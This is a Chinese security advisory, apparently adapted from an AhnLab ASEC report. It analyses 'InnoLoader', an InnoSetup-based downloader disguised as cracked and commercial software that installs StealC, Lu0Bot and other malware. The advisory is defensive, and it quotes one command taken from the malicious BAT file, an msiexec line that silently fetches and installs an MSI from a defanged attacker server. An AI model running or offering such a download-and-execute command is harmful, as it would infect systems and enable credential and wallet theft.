伪装成破解程序和商业工具的新型恶意软件正在传播
AhnLab SEcurity情报中心(ASEC)发现了一种伪装成裂缝和商业工具的新型恶意软件的分布。与过去的恶意软件在执行后立即执行恶意行为不同,该恶意软件显示安装程序UI,恶意行为在安装过程中点击按钮后执行。
认为当用户发出下载请求时,立即创建恶意软件以给出回复,而不是分发预先制作的恶意软件。这意味着每次下载,都会创建和下载具有不同哈希值和相同功能的恶意软件。
该恶意软件可以根据C2的响应下载和执行文件。分发时的调查显示,安装了Infostealer StealC、使用受感染系统作为商业代理资源的Socks5Systemz和伪装成安全相关浏览器插件以增加浏览量的Clicker。还发现安装了知名软件Opera浏览器和360安全产品。
图1.分发恶意软件的网页
插入样本中的C2字符串包含下载请求时的时间戳值和国家信息。据信,每个下载请求都会创建和分发一个新的恶意软件菌株。因此,每次下载样本本身的C2 URI和哈希都会不同。
图2.恶意软件C2 URL
经确认,在以前已经下载过恶意软件历史的IP地址环境中,下载了一段时间的正常WinRAR安装文件。这被认为是为了阻碍恶意软件跟踪和分析。
图3.下载的恶意软件(顶部)和普通文件(底部)
该恶意软件是使用InnoSetup创建的。执行后,输出以下安装屏幕。单击“下一步”按钮两次会触发恶意行为。为方便起见,它将被称为“InnoLoader”。
图4.恶意软件执行屏幕
威胁参与者使用连接到外部网络的InnoDownloadPlugin插件来下载额外的安装程序。
它被配置为当第一次连接到C2时的响应值为“确定”时执行恶意行为。但是,在下载样本后的一定时间后,C2响应“否”。在这种情况下,安装过程终止而没有恶意行为。这也被解释为试图阻碍分析。
图5. C2响应
一旦从C2接收到“ok”响应,它就通过按顺序连接到文件内定义的C2 URL来获取下载URL。从该URL下载并执行一个文件。下载URL位于C2回复头的“位置”条目中。在这个过程中正在执行的文件包括正常文件和恶意软件文件。用于分析的恶意软件样本共有6个C2 URL。
图6.下载C2的URL响应
文件下载和执行完成后,它连接到下一个C2 URL,此过程重复,直到它连接到所有定义的C2 URL。恶意软件样本在分析时执行的文件如下。
表1. InnoLoader执行的文件信息
从BAT文件开始并执行的StealC Infostealer是关键元素。它是一种恶意软件,可以窃取重要的用户信息并将其发送到C2。它可以泄露存储在浏览器中的密码、加密货币钱包和FTP邮件的应用程序登录信息以及某些文件系统信息等信息。这是一个正在积极分发的Infostealer,也在下面的帖子中有所介绍。
- 警告伪装成安装程序的信息窃取者
InnoLoader下载并执行的BAT文件被混淆如下所示。执行后,它会从C2下载并执行恶意MSI文件。
图7.恶意BAT文件的内容
- 执行命令:"msiexec /ihxxp://240601155351354. try.kyhd08[.]buzz/f/fvgbm0601001.msi /qn"
MSI文件被伪装成Microsoft VisualC++安装程序。
图8.恶意MSI文件属性
当MSI被执行时,它会在执行它们之前在TEMP目录中创建一个普通的Node. js可执行文件和一个混淆的恶意脚本。
- 812d99a3d89b8de1b866ac960031e3df(Node. js)
- 2e85211a7ab36e6d7e2a4a4b5d88b938(脚本)
图9.恶意脚本(部分消除混淆)
恶意脚本是Lu0Bot恶意软件,它按照一定的规则创建一个C2 URL,尝试访问,可以从受感染的系统中收集信息,并且可以执行命令,值得注意的是,它使用UDP与C2通信。在分析过程中,观察到Lu0Bot下载并执行StealC恶意软件。在这个过程中,在TEMP目录下创建了一个DLL文件和TXT文件。当DLL文件用某个参数执行时,StealC恶意软件最终被执行。
请注意,因为为了保持持久性,Lu0Bot将StealC安装在ProgramData目录下并在Startup文件夹中创建快捷方式。当该恶意软件运行时,威胁参与者可以随时安装任何其他恶意软件。
图10. Lu0Bot-StealC恶意软件执行流程
可以看出,恶意软件是通过一个非常复杂的过程执行的,以使分析和跟踪变得困难。这种恶意软件菌株目前正在积极分发。因为它可以根据来自C2的响应执行行为,所以威胁行为者可以随时安装他们希望的任何其他恶意软件。因此,威胁行为者正在使用各种方法来阻碍分析和检测。下载文件时必须使用官方分发站点。建议不要使用非法工具。用户不得执行从不受信任的页面下载的文件。
参考文章: https://blog.sonicwall.com/en-us/2024/06/new-orcinius-trojan-uses-vba-stomping-to-mask-infection/
图片来源于网络侵权可删